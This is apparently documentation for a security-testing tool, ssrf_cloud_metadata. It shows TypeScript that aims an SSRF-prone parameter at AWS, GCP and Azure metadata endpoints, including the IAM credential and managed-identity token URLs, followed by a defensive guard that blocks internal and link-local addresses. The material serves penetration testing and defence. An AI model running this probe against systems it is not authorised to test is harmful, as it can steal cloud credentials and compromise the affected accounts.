
ssrf_cloud_metadata

Test SSRF vulnerabilities by accessing cloud metadata endpoints (AWS/GCP/Azure) to identify potential exposure of IAM credentials and instance data.

Instructions

Test SSRF access to cloud metadata endpoints (AWS/GCP/Azure). Attempts to reach instance metadata services through the SSRF vector. Returns results array with provider, endpoint, status, length, response_snippet. Side effects: May cause target to request cloud metadata. Could expose IAM credentials if successful.

Input Schema

Name            Required  Description                                     Default
url             Yes       Target URL with SSRF-vulnerable parameter       -
parameter       Yes       Parameter that accepts URLs                     -
cloud_provider  No        Cloud provider to test metadata endpoints for   all
method          No        HTTP method                                     POST

Implementation Reference

  • The handler for the ssrf_cloud_metadata tool. For each provider it builds a curl request to the target in which the SSRF-prone parameter is set to a known instance-metadata URL, then records the HTTP status, response size and a snippet of the body so the caller can judge whether the target fetched the metadata on its behalf.
    async ({ url, parameter, cloud_provider = "all", method = "POST" }) => {
      requireTool("curl");
    
      // Metadata URLs that the vulnerable parameter is pointed at, grouped by provider.
      const endpoints: Record<string, Array<[string, string]>> = {
        aws: [
          ["instance_id", "http://169.254.169.254/latest/meta-data/instance-id"],
          ["iam_role", "http://169.254.169.254/latest/meta-data/iam/security-credentials/"],
          ["user_data", "http://169.254.169.254/latest/user-data"],
          ["hostname", "http://169.254.169.254/latest/meta-data/hostname"],
          ["token_v2", "http://169.254.169.254/latest/api/token"],
        ],
        gcp: [
          ["project_id", "http://metadata.google.internal/computeMetadata/v1/project/project-id"],
          ["service_accounts", "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"],
          ["hostname", "http://metadata.google.internal/computeMetadata/v1/instance/hostname"],
        ],
        azure: [
          ["instance", "http://169.254.169.254/metadata/instance?api-version=2021-02-01"],
          ["identity", "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"],
        ],
      };
    
      const providersToTest =
        cloud_provider === "all" ? Object.keys(endpoints) : [cloud_provider];
    
      const results = [];
      for (const provider of providersToTest) {
        for (const [epName, epUrl] of endpoints[provider] ?? []) {
          // Percent-encode the metadata URL before placing it in a form field or
          // query string: the Azure endpoints contain "?" and "&", which the target
          // would otherwise split into separate parameters.
          const encodedEpUrl = encodeURIComponent(epUrl);
          let curlArgs: string[];
          if (method === "POST") {
            curlArgs = [
              "-sk",                                        // silent; accept untrusted TLS certificates
              "-o", "-",                                    // write the body to stdout ...
              "-w", "\n__META__%{http_code}:%{size_download}", // ... followed by a status:size marker
              "-X", "POST",
              "-d", `${parameter}=${encodedEpUrl}`,
              url,
            ];
          } else {
            // Append to an existing query string rather than adding a second "?".
            const sep = url.includes("?") ? "&" : "?";
            curlArgs = [
              "-sk",
              "-o", "-",
              "-w", "\n__META__%{http_code}:%{size_download}",
              `${url}${sep}${parameter}=${encodedEpUrl}`,
            ];
          }
    
          const res = await runCmd("curl", curlArgs);
          let body = res.stdout;
          // Separate the response body from the trailing __META__<code>:<bytes> marker.
          const metaMarker = body.lastIndexOf("__META__");
          let status = 0;
          let length = 0;
          if (metaMarker !== -1) {
            const meta = body.slice(metaMarker + "__META__".length).trim();
            const [codeStr, sizeStr] = meta.split(":");
            // "|| 0" guards against NaN when curl fails before a status code exists.
            status = parseInt(codeStr ?? "", 10) || 0;
            length = parseInt(sizeStr ?? "", 10) || 0;
            body = body.slice(0, metaMarker);
          }
    
          results.push({
            provider,
            endpoint_name: epName,
            metadata_url: epUrl,
            status,
            length,
            response_snippet: body.slice(0, 500), // truncated so credentials are not dumped wholesale
          });
        }
      }
    
      const result = {
        cloud_provider,
        results,
        hint: "Non-error responses with meaningful content indicate cloud metadata exposure.",
      };
      return { content: [{ type: "text" as const, text: JSON.stringify(result, null, 2) }] };
    }
  • Registration of the ssrf_cloud_metadata tool, including its schema definition.
    server.tool(
      "ssrf_cloud_metadata",
      "Test SSRF access to cloud metadata endpoints (AWS/GCP/Azure). Attempts to reach instance metadata services through the SSRF vector. Returns results array with provider, endpoint, status, length, response_snippet. Side effects: May cause target to request cloud metadata. Could expose IAM credentials if successful.",
      {
        url: z.string().describe("Target URL with SSRF-vulnerable parameter"),
        parameter: z.string().describe("Parameter that accepts URLs"),
        cloud_provider: z
          .enum(["aws", "gcp", "azure", "all"])
          .optional()
          .describe("Cloud provider to test metadata endpoints for"),
        method: z.enum(["GET", "POST"]).optional().describe("HTTP method"),
      },
      /* fourth argument: the async ({ url, parameter, cloud_provider, method }) => { ... } handler shown above */
    );
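The probe above only succeeds when the target's server-side fetcher will follow a user-supplied URL to a link-local or internal host. The block below is an added example, not code from the Operant MCP server or from Glama, showing the pre-request check a defender would place in front of such a fetcher so that every endpoint in the handler's list is refused. It assumes Node's WHATWG `URL` parser (which folds decimal, hex and octal IPv4 spellings such as `http://2852039166/` into dotted-decimal) and adds `fd00:ec2::254`, the AWS IMDS IPv6 address, which is not on the page. The function names `isMetadataOrInternalUrl`, `ipv4Octets` and `allProbesBlocked` are this example's own.

```typescript
// Added defensive example: reject user-supplied URLs that point at cloud
// metadata services or other internal address space before fetching them.
// This is a pre-request check only. A complete defence also re-validates the
// resolved IP at connect time (DNS rebinding) and refuses redirects, neither
// of which this example covers.

// Hostnames used by instance metadata services. 169.254.169.254 (AWS/Azure)
// and metadata.google.internal (GCP) come from the tool's endpoint list;
// "metadata" is GCP's short alias and fd00:ec2::254 is AWS IMDS over IPv6
// (both assumptions not taken from the page).
const METADATA_HOSTS = new Set([
  "169.254.169.254",
  "metadata.google.internal",
  "metadata",
  "fd00:ec2::254",
]);

// Parse a canonical dotted-decimal IPv4 host into four octets, or null.
function ipv4Octets(host: string): number[] | null {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return null;
  const octets = m.slice(1).map(Number);
  return octets.every((o) => o <= 255) ? octets : null;
}

// Ranges a server-side fetcher must never be steered into from user input:
// link-local (where IMDS lives), loopback, RFC 1918 and the unspecified address.
function isBlockedIPv4(octets: number[]): boolean {
  const [a, b] = octets;
  return (
    (a === 169 && b === 254) ||          // 169.254/16, covers IMDS and ECS task endpoints
    a === 127 ||                         // loopback
    a === 10 ||                          // RFC 1918
    (a === 172 && b >= 16 && b <= 31) || // RFC 1918
    (a === 192 && b === 168) ||          // RFC 1918
    a === 0                              // 0.0.0.0 reaches the local host on many stacks
  );
}

function isBlockedIPv6(host: string): boolean {
  const h = host.toLowerCase();
  if (h === "::1" || h === "::") return true;       // loopback / unspecified
  if (h.startsWith("fe80:")) return true;           // link-local
  if (/^f[cd][0-9a-f]{2}:/.test(h)) return true;    // unique-local fc00::/7
  if (h.startsWith("::ffff:")) {                    // IPv4-mapped, e.g. ::ffff:a9fe:a9fe
    const rest = h.slice("::ffff:".length);
    const dotted = ipv4Octets(rest);
    if (dotted) return isBlockedIPv4(dotted);
    const groups = rest.split(":");
    if (groups.length === 2 && groups.every((g) => /^[0-9a-f]{1,4}$/.test(g))) {
      const [hi, lo] = groups.map((g) => parseInt(g, 16));
      return isBlockedIPv4([hi >> 8, hi & 0xff, lo >> 8, lo & 0xff]);
    }
  }
  return false;
}

function parseUrl(raw: string): URL | null {
  try { return new URL(raw); } catch { return null; }
}

// True when the URL must not be fetched on the user's behalf.
function isMetadataOrInternalUrl(raw: string): boolean {
  const u = parseUrl(raw);
  if (!u) return true;                                        // unparseable: refuse rather than pass to curl
  if (u.protocol !== "http:" && u.protocol !== "https:") return true;
  const host = u.hostname.replace(/^\[|\]$/g, "").toLowerCase(); // strip IPv6 brackets
  if (METADATA_HOSTS.has(host)) return true;
  const v4 = ipv4Octets(host);
  if (v4) return isBlockedIPv4(v4);
  if (host.includes(":")) return isBlockedIPv6(host);
  return false; // public hostname: still resolve and re-check the address before connecting
}

// A sample of the metadata URLs the tool sends through the SSRF parameter,
// copied from its endpoint table, to confirm the guard refuses each of them.
const PROBED_METADATA_URLS = [
  "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
  "http://169.254.169.254/latest/api/token",
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/",
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/",
];

function allProbesBlocked(): boolean {
  return PROBED_METADATA_URLS.every(isMetadataOrInternalUrl);
}

console.log("all probed metadata URLs refused:", allProbesBlocked());
```

Wire `isMetadataOrInternalUrl` in before the fetch, not after: once the request has left the host, the metadata service has already answered. Because the check runs on the parsed hostname rather than the raw string, the alternate spellings the WHATWG parser normalises (`http://0xa9fea9fe/`, `http://2852039166/`, `http://[::ffff:169.254.169.254]/`) are caught as well.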
